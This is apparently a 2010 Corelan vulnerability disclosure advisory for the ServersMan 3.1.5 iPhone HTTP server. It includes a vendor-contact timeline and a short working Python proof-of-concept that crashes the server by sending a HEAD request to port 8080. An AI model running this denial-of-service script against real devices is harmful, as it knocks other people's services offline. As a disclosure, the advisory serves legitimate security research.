ServersMan 3.1.5 Denial Of Service

`|------------------------------------------------------------------|  
| __ __ |  
| _________ ________ / /___ _____ / /____ ____ _____ ___ |  
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |  
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |  
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |  
| |  
| http://www.corelan.be:8800 |  
| [email protected] |  
| |  
|-------------------------------------------------[ EIP Hunters ]--|  
| |  
| Vulnerability Disclosure Report |  
| |  
|------------------------------------------------------------------|  
  
Advisory : CORELAN-10-005  
Disclosure date : 27th Jan 2010  
  
  
0x00 : Vulnerability information  
--------------------------------  
  
[*] Product : Apple Iphone/Ipod - Serversman HTTP Server  
[*] Version : 3.1.5   
[*] Vendor : ServersMan  
[*] URL : http://serversman.com/index_en.jsp  
[*] Platform : Darwin osx (Iphone) 3G  
[*] Type of vulnerability : Remote DoS  
[*] Risk rating : Low  
[*] Issue fixed in version : <unfixed>  
[*] Vulnerability discovered by : mr_me  
[*] Greetings to : corelanc0d3r, EdiStrosar, rick2600, ekse, MarkoT, sinn3r & Jacky from Corelan Team  
  
  
0x01 : Vendor description of software  
-------------------------------------  
From the vendor website:  
  
Share your files with friends via ServerMan. Use your iPhone, iPod Touch or Windows Mobile as a web server. Publish audio, pictures, your current location.  
  
  
0x02 : Vulnerability details  
----------------------------  
The vulnerability can be triggered by using a HTTP 'head' request to access the default web root '/' on the device.   
  
  
  
  
0x03 : Vendor communication  
---------------------------  
[*] January 3, 2010 - Initial contact  
[*] January 4, 2010 - Vendor replied requesting PoC code  
[*] January 4, 2010 - Provided vendor with PoC  
[*] January 11, 2010 - Requested patch date and confirmation of vulnerability  
[*] January 12, 2010 - Received confirmation of vulnerability  
[*] January 24, 2010 - Contacted vendor for patch date  
[*] January 27, 2010 - No response from vendor  
  
0x04 : Exploit/PoC  
------------------  
#!/usr/bin/python  
#  
# Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DoS exploit  
# Found by: Steven Seeley (mr_me) seeleymagic [at] hotmail [dot] com  
# Homepage: http://serversman.com/index_en.jsp  
# Download: From the app store (use your itunes account)  
# Tested on: Iphone 3G - firmware 3.1.2 (Darwin kernel)  
# Greetz to: corelanc0d3r, EdiStrosar, rick2600, ekse, MarkoT, sinn3r & Jacky from Corelan Team  
# Special Greetz to TecR0c!  
  
print "|------------------------------------------------------------------|"  
print "| __ __ |"  
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"  
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"  
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"  
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"  
print "| |"  
print "| http://www.corelan.be:8800 |"  
print "| [email protected] |"  
print "| |"  
print "|-------------------------------------------------[ EIP Hunters ]--|"  
print "[+] Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DOS exploit"  
  
import socket  
import sys  
  
def Usage():  
print ("Usage: ./serversman.py <serv_ip>\n")  
print ("Example: ./serversman.py 192.168.48.183\n")  
if len(sys.argv) <> 2:  
Usage()  
sys.exit(1)  
else:  
hostname = sys.argv[1]  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
try:  
sock.connect((hostname, 8080))  
print "[+] Connecting to the target.."  
except:  
print ("[-] Connection error!")  
sys.exit(1)  
print "[+] Sending payload.. muhaha ph33r"  
sock.send("HEAD / HTTP/1.0\r\n\r\n")  
r=sock.recv(1024)  
sock.close()  
print "[+] HTTP Server is now DoSed!"  
sys.exit(0);  
`